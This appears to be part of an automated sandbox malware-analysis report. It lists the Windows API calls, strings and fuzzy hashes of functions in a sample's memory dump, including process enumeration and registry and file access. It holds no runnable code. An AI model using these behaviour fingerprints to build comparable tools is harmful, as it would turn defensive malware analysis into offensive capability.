                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID:
                                                              • API String ID: 2221118986-0
                                                              • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                              • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
APIs
• FreeLibrary.KERNELBASE(?), ref: 0044DEB6
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
APIs
• API ID: _wcsicmp
APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free
